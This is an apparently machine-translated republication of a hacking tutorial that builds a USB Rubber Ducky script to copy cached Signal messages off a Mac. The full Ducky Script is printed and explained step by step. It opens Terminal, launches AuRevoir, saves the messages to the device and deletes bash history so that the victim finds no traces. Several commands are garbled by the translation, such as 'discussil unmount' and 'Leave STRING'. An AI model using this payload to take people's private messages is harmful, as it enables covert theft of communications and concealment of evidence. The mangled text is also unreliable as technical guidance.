قالب وردپرس درنا توس
Home / Tips and Tricks / How To Steal Signal Conversations From A MacBook With A USB Rubber Ducky «Zero Byte :: WonderHowTo

How To Steal Signal Conversations From A MacBook With A USB Rubber Ducky «Zero Byte :: WonderHowTo



Developed by Open Whisper Systems, Signal is a free, open-source encrypted mobile and desktop device communications application that enables users to make voice calls, send instant messages, and even make video calls securely. Recently, however, a security vulnerability has been discovered for the desktop version that can be converted to a USB Rubber Ducky payload to steal single-click signaling messages.

Signal Messenger is extremely popular with privacy-conscious users because of its blend of privacy and convenience, but this compromise has consequences. Security researchers Alec Muffett and Patrick Wardle have discovered a vulnerability that allows sound messages that have been "deleted" by the desktop application to be retrieved in plain text and without a password from a MacOS computer. This is possible because of the way macOS stores signal messages that are displayed in plain text in pop-up alerts.

Patrick, a former NSA security researcher who developed free security applications for macOS, has even created an app that allows users to delete these messages or drop them off in a text file, even though they are already over for discretion one of Signal's critical features were removed: " disappearing news." This application called AuRevoir makes it easier to access these messages and can be downloaded from the GitHub site.

The Signal Messenger desktop application for macOS.

While Signal has patched this vulnerability in the future, all messages already in the messaging system are still there and have a fair game. Today we demonstrate how to use AuRevoir to create a one-click Ducky script to steal all signal messages on a MacBook or other Mac computer in about 45 seconds.

The Exploit with a Rubber Ducky Weapon

Take this exploit to the next level, we can pack it into a USB Rubber Ducky Exploit to quickly clear signal conversations on any macOS device we have physical access to. The USB Rubber Ducky is a versatile attack platform that can do this in a variety of ways, but instead of using a wget request to download and run the application, we can use the "Twin Duck" firmware. Allow us in that both the application and the stolen signal messages are hosted on the Rubber Ducky. This prevents us from having to download and run the app ourselves or exfiltrate data by email.

Image from Kody / Null Byte

We use the Twin Duck firmware for our USB Rubber Ducky can be recognized both as a keyboard and as a USB mass storage device. We can use this setup to automate most parts of this hack, with one manual part needed being a single click on the "Show messages" button. This is because the USB Rubber Ducky can not simulate mouse clicks, but in a future iteration, some Python code might cause it.

As a disclaimer, it is illegal to copy a user's messages without their permission, so this should only be done on a system that you have access to. While the messages are not stored encrypted, obtaining private messages without permission may be illegal, depending on your jurisdiction.

What you need

To start, you need a Ducky USB Rubber from Hak5. The default firmware does not work for this attack, so we need to flash custom firmware. To do this, you can refer to our tutorial on flashing the firmware on the USB Rubber Ducky.

You can flash Twin Duck firmware by downloading Ducky Flasher, which is included in the Hak5 GitHub repository. The Ducky Flasher can flash a variety of firmware, each of which changes the behavior of the USB Rubber Ducky.

Image from Kody / Null Byte

To write Ducky Script and encode a payload, you can use the Use the Duck Encoder included in the GitHub link above, or simply use a web interface such as the Duck Toolkit.

We also have to do this. This includes the AuRevoir application from Patrick Wardle, with which we can find all the news on the system. You can download this from the ObjectiveSee GitHub.

The AuRevoir Application

Patrick Wardle's AuRevoir application is an excellent tool for retrieving signal messages stored in the macOS notification system, and it is very user friendly and straightforward way. With a helpful graphical user interface, the tool is the best solution for the average user in detecting and clearing signal notifications stored on their computer.

Developing an Exploit by Observing the Process

Developing a USB Rubber Ducky script requires creativity, patience, and careful observation of the process you want to encrypt. In particular, accessing a computer with a similar configuration is a must if you try your Ducky Script during development. Some things like custom keyboard shortcuts can also turn off the Ducky script payload, so if your target does not use the standard keyboard shortcuts, you might experience problems.

In this case we need to write code to load an application Copy the retrieved messages from the Ruber Ducky, and then create them, and paste them into a text file on the Rubber Ducky for easy exfiltration. We also need to make sure that no windows remain open on the system, including the message "Disk not ejecting properly". For maximum camouflage, this payload should run as fast as possible, leave no traces in the terminal history, and leave no windows open after they have completed their function.

Image from Kody / Null Byte

The most important part of developing a Ducky-Script payload is to test them on different computers as often as possible. You can optimize the results for your target system and take into account all the variables that could stumble your script. Keep in mind that the USB Rubber Ducky can not see what happens, so it can not be recovered if a pop-up window or something else throws it off track.

Writing the Ducky Script

The Ducky Language The written script is very simple and you can quickly learn how to write it by referring to the Ducky Script documentation, but in general You can do everything you can do with a keyboard in Ducky Script. Everything you want to type is preceded only by the tag STRING, and any key combination can be simulated with tags like ENTER or COMMAND.

In this case our script is relatively simple. You can see the script we will use below. The final version of the script has been shortened to approximately 45 seconds to complete the original minute and 15 seconds, but you may need to add a delay time if the target system is running slowly.

  REM MACOS SIGNAL MESSAGE STEALER FOR TWIN DUCK
REM - SKICKAR FOR HACKER EXCHANGE 2018
REM Note: Requires you to click "View Messages" to work
DELAY 2000
GUI SPACE
DELAY 400
STRING port
DELAY 100
ENTER
DELAY 1000
STRING open /Volumes/DUCKY/AuRevoir.app
DELAY 500
ENTER
DELAY 9000
COMMAND A
COMMAND C
ESCAPE
GUI q
DELAY 400
GUI q
COMMAND STAFF
DELAY 400
STRING nano / Volumes / DUCKY / stealer.txt
ENTER
DELAY 400
Command v
DELAY 5000
CTRL X
DELAY 200
STRING y
DELAY 300
ENTER
DELAY 200
STRING discussil unmount / volumes / DUCKY
DELAY 100
ENTER
DELAY 1500
STRING rm ~ / .bash_history && history -c
DELAY 100
ENTER
DELAY 400
Leave STRING
ENTER
DELAY 700
GUI q 

Let's briefly explain what it does:

After a short delay of 2 seconds to mount the USB part of the Rubber Ducky, we need to access a terminal window to see the benefits Use the USB Rubber Ducky to enter commands quickly. To do this, we use a keyboard shortcut that is enabled by default on macOS computers. This is the command Command and Space pressed simultaneously. This opens a search window where we search for "Terminal" and press Enter [Return] .

  DELAY 2000 can start
GUI SPACE
DELAY 400
STRING port
DELAY 100
ENTER 

Next, we need to open the AuRevoir.app file, which is hosted on our USB Rubber Ducky. If you have not already added the AuRevoir app, just drag it onto the Rubber Ducky SD card while adding the payload.

Opening the app is easy and we can just open command followed by the location of the file on our USB Rubber Ducky. As soon as we hit Enter / Return the app will open, and I left a delay of about 9 seconds for the user to click on the button needed to continue the script.

This is the only part of the script that requires interaction from the user, as after opening the app, it is necessary to click the "Show Msgs" button for the script to copy it in the next step. Since the USB Rubber Ducky can not send mouse events, this is the only part of the script that is not automated.

  DELAY 1000
STRING open /Volumes/DUCKY/AuRevoir.app
DELAY 500
ENTER
DELAY 9000 

Now that we have the news in front of us, we can all tick with Command and A at the same time, and then Command and C copy them all. Then we can close out of AuRevoir by pressing the Esc key and then pressing the key combinations and Q twice. This is required to clear both the program and pop-up window after asking if you want to donate to the author.

  COMMAND A
COMMAND C
ESCAPE
GUI q
DELAY 400
GUI q 

We need to go back to the terminal window and collect the data we copied. We can do this by simultaneously pressing the keys and . This brings us back to our terminal window, where we can create a new text file on our Rubber Ducky with a simple command nano . I chose the file stealer.txt, but could call it a little less suspicious.

After typing about six seconds for a very long message dump, the script saves and validates the text file by typing Control and X at the same time, and then typing Y and press Enter / Return . This should save the file. At this point, we copied and pasted all the signal messages onto the Rubber Ducky, and in case of emergency, we could go now. After about 44 seconds, this script has already reached our main purpose, but we still need to spend some time clearing the windows and making sure nothing is left on the screen for the victim.

  COMMAND TAB
DELAY 400
STRING nano / Volumes / DUCKY / stealer.txt
ENTER
DELAY 400
Command v
DELAY 5000
CTRL X
DELAY 200
STRING y
DELAY 300
INPUT 

The remaining tasks we need to do to disable the target clean up the removal of the rubber ducky to avoid an error message, remove all terminal command records, and close any windows opened by the script. We will do this by using the Disk Utility to dismount the USB mass storage section of the USB Rubber Ducky before we remove it, and then execute a command to remove the file in which the BASH terminal is located Run is saved.

When the BASH history is deleted and the Ducky is ejected, the last lines of the script exit the bash session and close the window.

  DELAY 200
STRING discussil unmount / volumes / DUCKY
DELAY 100
ENTER
DELAY 1500
STRING rm ~ / .bash_history && history -c
DELAY 100
ENTER
DELAY 400
Leave STRING
ENTER
DELAY 700
GUI q 

This restores the machine to the state it was in after discretely copying the signaling messages without leaving visible traces on the system.

Once this payload is written, you can use the Duck Toolkit website to encode it into an inject.bin file that you can download and load onto your Rubber Ducky. This should be everything you need to automate the attack and prepare your USB Rubber Ducky.

Defending Against Attack

The USB Rubber Ducky is a disposable device, which means that it can not respond to changes or unexpected events on the screen. If pop-ups occur or the keyboard configuration is different, this will result in errors in the execution of the script. Our producer's laptop was invulnerable to this script because it turned off Command and Space to open the Spotlight window and prevent the Ducky from opening a terminal window.

The best way to ensure that you are not compromised by the Signal Messenger stealing attack is to update your Signal Desktop application and make sure that AuRevoir deletes all messages that were cached before the update were. After that you should not steal any more messages, and you can relax and worry about all the other horrible things that could come out of a rubber duck next to this payload. In general, you should never leave your laptop unlocked and unattended.

I hope you liked this guide that lets you steal the AuRevoir app to create a signal message, the Ducky Script payload! If you have questions about this tutorial or generally write Ducky Script payloads, feel free to leave a comment or contact me on Twitter @KodyKinzie .

Do not Miss: Zero Byte's Guides to Hacking MacOS

Cover Picture and Screenshots of Kody / Null Byte




Source link